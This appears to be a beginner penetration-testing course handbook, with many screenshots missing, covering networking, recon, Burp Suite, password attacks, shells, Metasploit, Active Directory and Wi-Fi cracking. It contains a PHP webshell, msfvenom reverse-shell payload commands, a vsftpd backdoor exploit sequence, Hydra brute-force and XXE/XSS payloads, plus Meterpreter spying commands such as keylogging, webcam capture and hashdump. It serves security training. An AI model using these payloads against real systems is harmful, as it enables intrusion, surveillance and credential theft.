1

Chapter 1: Introduction
Chapter 2: Network
Chapter 3: How The Web Work
Chapter 4: Install Kali Linux & Linux Command
Chapter 5: Exploit & CVE
Chapter 6: Information Gathering (Recon)
Chapter 7: Burp Suite
Chapter 8: Password Attack
Chapter 9: Shell
Chapter 10: Wireshark
Chapter 11: Network Service Attack
Chapter 12: OWASP 10
Chapter 13: Web Hacking
Chapter 14: Metasploit
Chapter 15: Active Directory
Chapter 16: Wi-Fi Hacking
Chapter 17: Capture The Flag (CTF)

2
 Chapter 1
Introduction

3
4
Chapter 2
Network

5
IP Addresses:
Briefly, an IP address (or Internet Protocol) address can be used as a way of identifying
a host on a network for a period of time, where that IP address can then be associated
with another device without the IP address changing. First, let's split up precisely what
an IP address is in the diagram below:

An IP address is a set of numbers that are divided into four octets. The value of each
octet will summaries to be the IP address of the device on the network. This number is
calculated through a technique known as IP addressing & subnetting.
What's important to understand here is that IP addresses can change from device to
device but cannot be active simultaneously more than once within the same network.

These two devices will be able to use their private IP addresses to communicate with
each other. However, any data sent to the Internet from either of these devices will be
identified by the same public IP address. Public IP addresses are given by your Internet
Service Provider (or ISP).

We Have to type of IP IPv4 and IPv6

6
MAC Address:
Devices on a network will all have a physical network interface, which is a microchip
board found on the device's motherboard. This network interface is assigned a unique
address at the factory it was built at, called a MAC (Media Access Control ) address.
The MAC address is a twelve-character hexadecimal number (a base sixteen
numbering system used in computing to represent numbers) split into two's and
separated by a colon. These colons are considered separators. For example,
a4:c3:f0:85:ac:2d. The first six characters represent the company that made the network
interface, and the last six is a unique number.

7
8
Fire Walls: A firewall is a device within a network responsible for determining what
traffic is allowed to enter and exit. Think of a firewall as border security for a network. An
administrator can configure a firewall to permit or deny traffic from entering or exiting a
network based on numerous factors such as:

 Where the traffic is coming from? (has the firewall been told to accept/deny traffic
from a specific network?)
 Where is the traffic going to? (has the firewall been told to accept/deny traffic
destined for a specific network?)
 What port is the traffic for? (has the firewall been told to accept/deny traffic
destined for port 80 only?)
 What protocol is the traffic using? (has the firewall been told to accept/deny traffic
that is UDP, TCP or both?)

Network Services:

What is SMB? : SMB - Server Message Block Protocol - is a client-server

communication protocol used for sharing access to files, SMB runs (Microsoft Windows
operating systems)

What is Telnet?: connect to and execute commands on a remote machine that's

hosting a telnet server (sends all messages in clear text).

What is FTP? : File Transfer Protocol (FTP), a protocol used to allow remote transfer of
files over a network.

What is NFS?: NFS stands for "Network File System" and allows a system to share
directories and files with others over a network. By using NFS, users and programs can
access files on remote systems almost as if they were local files.

What is SMTP?: SMTP stands for "Simple Mail Transfer Protocol". It is utilised to
handle the sending of emails. In order to support email services.

9
 Chapter 3
How The Web Work

What is DNS?
DNS (Domain Name System) provides a simple way for us to communicate with
devices on the internet without remembering complex numbers. Much like every house
has a unique address for sending mail directly to it, every computer on the internet has
its own unique address to communicate with it called an IP address. An IP address
looks like the following 104.26.10.229, 4 sets of digits ranging from 0 - 255 separated by
a period. When you want to visit a website, it's not exactly convenient to remember this
complicated set of numbers, and that's where DNS can help. So instead of
remembering 104.26.10.229, you can remember tryhackme.com instead.

10
DNS Record Types:

A Record

These records resolve to IPv4 addresses, 104.26.10.229

AAAA Record

These records resolve to IPv6 addresses, 2606:4700:20::681a:be5

CNAME Record

These records resolve to another domain name, for example, SulyCyberCon online
shop has the subdomain name store.sulycybercon.com which returns a CNAME record
shops.shopify.com.

MX Record

handle the email for the domain you are querying, for example an MX record response
for sulycybercon.com would look something like alt1.aspmx.l.google.com.

What is HTTP? (HyperText Transfer Protocol)

What is HTTPS? (HyperText Transfer Protocol Secure)

11
What is a URL? (Uniform Resource Locator)

HTTP methods: POST, GET, OPTIONS, PUT, DELETE

GET Request

This is used for getting information from a web server.

POST Request

This is used for submitting data to the web server and potentially creating new records

PUT Request

This is used for submitting data to a web server to update information

DELETE Request

This is used for deleting information/records from a web server

12
HTTP Status Codes:

Common HTTP Status Codes:

Cookie: Cookies can be used for many purposes but are most commonly used for
website authentication.

13
 Chapter 4
Install Kali Linux
&
Linux Command

14
 Chapter 5
Exploit & CVE

15
Exploit:
Exploitation is a piece of programmed software or script which can allow hackers to take
control over a system, exploiting its vulnerabilities.

1. SearchSploit
2. Exploit-DB
3. Metasploit

Common Vulnerabilities and Exposures (CVE):

A classic example of a CVE is the recent Log4j vulnerability report (CVE-2021-44228). It

contains detailed information about a vulnerability of the popular Java logging
framework, Apache Log4j. Many service providers, like AWS, Cloudflare and Twitter,
were affected by this vulnerability.

Common Vulnerability Scoring System (CVSS):

Introduction:
When you are submitting a vulnerability report to a company, it is very important to be
able to communicate your findings in a clear and concise manner, where the security or
triage team receiving your report are able to reproduce it as quickly as possible.

16
Attack Vector:
Describing deeply the 4 scenarios, we can have: a Remote attack when the exploit can
be delivered over the Internet, an Adjacent attack vector when the malicious actor is
inside the same intranet of the victim, a Local scenario is when the issue lies at
operating system accounts level, and finally a Physical attack vector is when you can
physically access the victim’s device.

Attack Complexity:
does it require additional information about the target such as unguessable IDs, a
certain configuration or settings, valid credentials (e.g. for MFA issues), or some other
conditions in order for your exploit to work?

Privileges Required:
if the vulnerable component is within an admin panel, we recommend setting the
requirement to “High” versus a vulnerability where you need to be invited to an
organization by an admin (where as self registration is not possible) we recommend
privileges to be as low.

User Interaction
vulnerability can be exploited solely at the will of the attacker, or whether a separate
user (or user-initiated process) must participate in some manner. The Score is highest
when no user interaction is required since it increases a further step in the exploitability
of the attack.

Scope
Does a successful attack impact a component other than the vulnerable component? If
so, the Score increases and the Confidentiality, Integrity and Authentication metrics
should be scored relative to the impacted component.

Confidentiality
confidentiality of the information resources managed by a software due to a successfully
exploited vulnerability. Confidentiality refers to limiting information access and
disclosure to only authorized users, as well as preventing access by, or disclosure to,
unauthorized.

17
Integrity
integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness
and veracity of information.

Availability
availability of the impacted component resulting from a successfully exploited
vulnerability. It refers to the loss of availability of the impacted component itself, such as
a networked service (e.g., web, database, email). Since availability refers to the
accessibility of information resources, attacks that consume network bandwidth,
processor cycles, or disk space all impact the availability of an impacted component.

Examples

Stored XSS from authenticated user to an unauthenticated user:

 Attack Vector: Network as the attack can be done over the Internet
 Attack Complexity: Low as there are no particular premises needed for this
attack to be successful
 Privileges Required: None if the attacker can deliver the payload as
unauthenticated. Or we can set it to Low if the attacker needs to be
authenticated in order to deliver the payload
 User Interaction: Required in case the user has to do some non-basic interaction
with the website in order to trigger the payload (like clicking a link). None in case
the victim needs to visit the homepage or do very trivial interactions with the
website
 Scope: Changed since the vulnerable component is the web server and the
impacted component is the browser
 Confidentiality: Low - if access to the DOM is granted. None, if there is no
access to the DOM
 Integrity: Low since XSS can always cause defacement
 Availability: None because the application can still be used by the victims

18
Stored XSS from an admin to a user:
 Attack Vector: Network as the attack can be done over the Internet
 Attack Complexity: Low as there are no particular premises needed for this
attack to be successful
 Privileges Required: High because the attackers needs to be an admin in order
for this vulnerability to be exploited
 User Interaction: Required in case the user has to do some non-basic interaction
with the website in order to trigger the payload (like clicking a link). None in case
the victim needs to visit the homepage or do very trivial interactions with the
website
 Scope: Changed since the vulnerable component is the web server and the
impacted component is the browser
 Confidentiality: Low if access to the DOM is granted, None if there is no access
to the DOM
 Integrity: Low the XSS can always cause defacement
 Availability: None because the application can still be used by the victims

IDOR with access to read and modify personally identifiable information (PII):

 Attack Vector: Network as the attack can be done over the Internet
 Attack Complexity: High if they are UUIDs or high-entropy IDs. Low if they are
sequential IDs
 Privileges Required: Low the attacker needs to be logged in to perform the
attack
 User Interaction: None as this is solely a server side issue
 Scope: Unchanged the impacted and the vulnerable component are the same
i.e. the web server
 Confidentiality: High because it gives access to PII
 Integrity: High because the attacker can delete/modify data
 Availability: None because the application can still be used by the victims

19
Full-response SSRF vs Blind SSRF:
 Attack Vector: Network as the attack can be done over the Internet
 Attack Complexity: Low since the attack is normally straight-forward
 Privileges Required: Low/High according to the level of privilege of the account
linked to the vulnerable functionality
 User Interaction: None as this is solely a server side issue
 Scope: Unchanged - in case of local port scanning as the impacted component
remains the web server. Changed if AWS or local file exfil is possible since the
impacted component is the cloud infrastructure
 Confidentiality: Low/High depending on the type of information shown. None: in
case of Blind SSRF (no output)
 Integrity: High in case AWS are leaked as it could lead to RCE. Low in case the
attacker can only access the intranet or the AWS
 Availability: None because the application can still be used even if this has been
fully exploited (this does not include some edge cases where SSRF can take
down a service)

20
 Chapter 6
Information Gathering (Recon)

21
 1. Passive Reconnaissance:
you can access from publicly available resources without directly engaging with
the target.
1. Whois
2. Shodan
3. Github
4. Waybackmachine
5. Google

2. Active Reconnaissance:
Active reconnaissance requires you to make some kind of contact with your
target. This contact can be a phone call or a visit to the target company.

1. Visit web site company

2. Ping
3. Ncat
4. Traceroute
5. Telnet
6. Nmap

Nmap:
Subnets with /16, This subnet can have around 65 thousand hosts.
Subnets with /24, This subnet can have around 250 hosts.

22
FIN Scan: The FIN scan sends a TCP packet with the FIN flag set, no response will be
sent if the TCP port is open. Again, Nmap cannot be sure if the port is open or if a
firewall is blocking the traffic related to this TCP port.

23
range: 10.11.12.15-20.
subnet: 10.11.12.15/24
nmap -iL list_of_hosts.txt

Service Detection:
Adding -sV to your Nmap command will collect and determine service and version
information for the open ports. You can control the intensity with --version-intensity
LEVEL where the level ranges between 0, the lightest, and 9, the most complete. -sV --
version-light has an intensity of 2, while -sV --version-all has an intensity of 9.

24
OS Detection:

25
Nmap Script Engine (NSE):

Or you can use this -sC or –script=vuln or –script “http-csrf.nse” like this, and you
can use this script category
nmap -sC MACHINE_IP
nmap –script=vuln MACHINE_IP
nmap –script “http-csrf.nse” MACHINE_IP
Saving the Output:
The three main formats are:
1. Normal
2. Grepable (grepable)
3. XML
Normal: -oN FILENAME
Grepable: The grepable format has its name from the command grep,
-oG FILENAME
XML: -oX FILENAME
you can save the scan output in all three formats using -oA FILENAME

26
Script
Category Description

auth Authentication related scripts

broadcast Discover hosts by sending broadcast messages

brute Performs brute-force password auditing against logins

default Default scripts, same as -sC

Retrieve accessible information, such as database tables

discovery
and DNS names

dos Detects servers vulnerable to Denial of Service (DoS)

exploit Attempts to exploit various vulnerable services

external Checks using a third-party service, such as Geoplugin and Virustotal

fuzzer Launch fuzzing attacks

Intrusive scripts such as brute-force attacks

intrusive
and exploitation

malware Scans for backdoors

safe Safe scripts that won’t crash the target

version Retrieve service versions

vuln Checks for vulnerabilities or exploit vulnerable services

27
SWITCH EXAMPLE DESCRIPTION

Attempts to determine the version of the

-sV nmap 192.168.1.1 -sV
service running on port

-sV –version- nmap 192.168.1.1 -sV – Intensity level 0 to 9. Higher number

intensity version-intensity 8 increases possibility of correctness

-sV –version- nmap 192.168.1.1 -sV – Enable light mode. Lower possibility of
light version-light correctness. Faster

-sV –version- nmap 192.168.1.1 -sV – Enable intensity level 9. Higher possibility
all version-all of correctness. Slower

Enables OS detection, version detection,

-A nmap 192.168.1.1 -A
script scanning, and traceroute

28
Chapter 6
Burp Suite

29
what is burp suite used for?

1. Foxy Proxy
2. Setup burp cert
3. Dashboard
4. Target
5. Proxy
6. Intruder
7. Repeater
8. Decoder
9. Extensions
10- Burp Collaborator Client

30
 Chapter 7
Password Attack

31
Offline Password Attack:

Dictionary Attack: contain a lot of word known as wordlist.

1. Cracking Hash
2. Cracking ZIP/RAR Password

Tool:
1. John
2. Hashcat
3. Hashid

BruteForce Attack: using digit for cracking hash password.

Tool:
1. Hashcat
2. John

32
Online Password Attack:
before we start attack you can use default credential after that start attack.

Default Credential:
1- https://default-password.info/
2- https://datarecovery.com/rd/default-passwords/
3- https://cirt.net/passwords?vendor=3COM
4-
crackstation.net is an online tool used for cracking Hash.

Tool:
Hydra: using hydra to attack:
1- HTTP
2- HTTPS
3- FTP
4- SSH
5- SMTP
6- SMB

33
Chapter 8
Shell

34
WebShells:
we would use this opportunity to upload code In these cases we would instead upload
a webshell.

<?php echo shell_exec($_GET["cmd"])?>

Reverse Shell:
A reverse shell, also known as a remote shell or “connect-back shell,” Reverse shells
allow attackers to open ports to the target machines.
listener : nc -lvnp <PORT>
We can use pentestmonke for php reverse shell:
1. PHP-Reverse-Shell
2. Reverse-shell-generator
3. PayloadAllTheThings-Shell

35
Chapter 9
Wireshark

36
Wireshark, a tool used for creating and analyzing PCAPs (network packet capture files),
is commonly used as one of the best packet analysis tools.

Filtering Operators:

 and - operator: and / &&

 or - operator: or / ||
 equals - operator: eq / ==
 not equal - operator: ne / !=
 greater than - operator: gt / >
 less than - operator: lt / <

Basic Filtering:
ip.addr == <IP Address>

37
ip.src == <SRC IP > and ip.dst == <DST IP >
tcp.port eq <Port #> or <Protocol Name>
udp.port eq <Port #> or <Protocol Name>

 Frame (Layer 1) -- This will show you what frame / packet you are looking at as
well as details specific to the Physical layer of the OSI model.

38
 Source [MAC] (Layer 2) -- This will show you the source and destination MAC
Addresses; from the Data Link layer of the OSI model.

 Source [IP] (Layer 3) -- This will show you the source and destination IPv4
Addresses; from the Network layer of the OSI model.

 Protocol (Layer 4) -- This will show you details of the protocol used (UDP/TCP)
along with source and destination ports; from the Transport layer of the OSI
model.

39
 Protocol Errors -- This is a continuation of the 4th layer showing specific
segments from TCP that needed to be reassembled.

 Application Protocol (Layer 5) -- This will show details specific to the protocol
being used such HTTP, FTP, SMB, etc. From the Application layer of the OSI
model.

 Application Data -- This is an extension of layer 5 that can show the application-
specific data.

40
 Chapter 11
Network service attack

41
FTP (File Transfer Protocol):
Enumeration FTP:

FTP Port is open lets try nmap script to scan FTP

42
Exploit FTP:

using Metasploit to exploit (FTP version is vsftpd 2.3.4)

43
1. msfconsole
2. search exploit vsftpd 2.3.4
3. use exploit/unix/ftp/vsftpd_234_backdoor
4. options
5. set RHOSTS 192.168.116.132
6. exploit

Secure Shell (SSH):

Enumeration SSH:

44
This site is vulnerable to LFI We can look at /etc/passwd and see username

Exploit SSH:

┌─[wolfkissed@parrot]─[~/Desktop]

└──╼ $hydra -l msfadmin -P wordlist.txt ssh://192.168.116.132

45
46
Network File System (NFS):
Enumeration NFS:

47
Exploit NFS:

48
Create SSH key and put into nfs directory

49
SMB:
Enumeration SMB:

Using enum4linux -a IP

50
Exploit SMB:

51
Download ssh key id_rsa

Not Working let download id_rsa.pub

52
Chapter 12
OWASP 10

53
1- Command Injection:

2- Broken Authentication:

We create darren username with space (darren )

54
3- Sensitive Data Exposure:

We found a Database file

55
4- XML External Entity:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>

5- Broken Access Control (IDOR):

We are noot user, lets change /note.php?note=1 to 0

We get the flag

56
6- Security Misconfiguration:

 Poorly configured permissions on cloud services, like S3 buckets

 Having unnecessary features enabled, like services, pages, accounts or privileges
 Default accounts with unchanged passwords
 Error messages that are overly detailed and allow an attacker to find out more about
the system
 Not using HTTP security headers, or revealing too much detail in the Server: HTTP
header

57
7- Cross-site Scripting (XSS):
1. Reflected XSS
2. Stored XSS
3. Dom Based
<script>alert(‘xss-wolfkissed’);</script>

8- Local File Inclusion (LFI) & Remote File Inclusion (RFI)

9- SQL Injection
10- SSRF

58
Chapter 13
Web Hacking

59
Walking An Application:
1- Viewing The Page Source
2- Developer Tools - Inspector
3- Developer Tools - Debugger
4- Developer Tools – Network

Content Discovery:
1- Manual Discovery - Robots.txt
2- Manual Discovery - Sitemap.xml
3- Manual Discovery - HTTP Headers
4- Manual Discovery - Framework Stack
5- OSINT - Google Hacking / Dorking
6- OSINT - Wappalyzer
7- OSINT - Wayback Machine
8- OSINT – GitHub
9- Automation - Fuzzing

Subdomain Enumeration:
1. Sublist3r
2. Assetfinder
3. subEnum
4. Google Droking
5. Vhost Fuzzing

Web Vulnerabilities
1. IDOR
2. SQL
3. Command Injection
4. SSRF
5. Cross-Site Scripting
6. Authentication Bypass
7. File Upload

60
Chapter 14
Metasploit

61
Metasploit:
Metasploit is the most widely used exploitation framework. Metasploit is a powerful tool
that can support all phases of a penetration testing engagement, from information
gathering to post-exploitation.

Type msfconsole to start metasploit.

You can use OS command In metasploit.

Metasploit Command:

Use : using exploit

show payloads : show all payloads
options : show all options to put value
background : put sessions to background
sessions : see sessions
set : set value
setg : value remain if you change module
unset : clear value
back : leave exploir context
search : search for exploit
exploit : run exploit
exploit -z : run exploit in background
check : check if the target system is vulnerable without exploiting it.

Metasploit Meterpreter:
msfvenom --list payloads show all payloads
Meterpreter commands

62
Core commands will be helpful to navigate and interact with the target system. Below
are some of the most commonly used. Remember to check all available commands
running the help command once a Meterpreter session has started.

Commands:
background: Backgrounds the current session
exit: Terminate the Meterpreter session
guid: Get the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session

File system commands

cd: Will change directory

ls: Will list files in the current directory (dir will also work)
pwd: Prints the current working directory
edit: will allow you to edit a file
cat: Will show the contents of a file to the screen
rm: Will delete the specified file
search: Will search for files
upload: Will upload a file or directory
download: Will download a file or directory

Networking commands

63
arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table

System commands

clearev: Clears the event logs

execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as OS

Other Command:

idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time

64
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database

Msfvenom:

msfvenom -l payloads
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw >
reverse_shell.php

Other Payloads:

Linux Executable and Linkable Format (elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf
> rev_shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f
exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw >
rev_shell.php

65
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f
asp > rev_shell.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw >
rev_shell.py

after that you can run Metasploit (msfconsole) and use this command ( use
exploit/multi/handler ) and set ( LHOST, LPORT , payload) and exploit or run

66
 Chapter 15
Active Directory

67
Windows domain is a group of users and computers. centralise the administration of
common components of a Windows computer network in a single repository called
Active Directory (AD). The server that runs the Active Directory services is known as a
Domain Controller (DC).
Users
Machines: PC$

Security
Description
Group
Users of this group have administrative privileges over the entire domain. By
Domain
default, they can administer any computer on the domain, including the
Admins
DCs.
Server Users in this group can administer Domain Controllers. They cannot change
Operators any administrative group memberships.
Backup Users in this group are allowed to access any file, ignoring their
Operators permissions. They are used to perform backups of data on computers.
Account
Users in this group can create or modify other accounts in the domain.
Operators

Domain Users Includes all existing user accounts in the domain.

Domain
Includes all existing computers in the domain.
Computers

Domain
Includes all existing DCs on the domain.
Controllers

When using Windows domains, all credentials are stored in the Domain Controllers.
Whenever a user tries to authenticate to a service using domain credentials, the service
will need to ask the Domain Controller to verify if they are correct. Two protocols can be
used for network authentication in windows domains:
 Kerberos: Used by any recent version of Windows. This is the default protocol in
any recent domain.
 NetNTLM: Legacy authentication protocol kept for compatibility purposes.
Kerberos Authentication: Kerberos authentication is the default authentication
protocol for any recent version of Windows.
NetNTLM Authentication: NetNTLM works using a challenge-response mechanism.

68
Active Directory Attack

Enumeration:

69
Know enumeration User

Know crack the hash with hashcat

70
Exploit:

71
allow us to retrieve all of the password hashes
know we use evil-win to pass the hass

72
 Chapter 16
Wi-Fi Hacking

73
Change Managed Mode to monitor mode

74
75
Let’s find 3 way handshake

Change monitor mode to managed mode

76
77
 Chapter 17
Capture The Flag CTF

78
 Basic Pentesting

Mr Robot

Blue

Juice Shop

79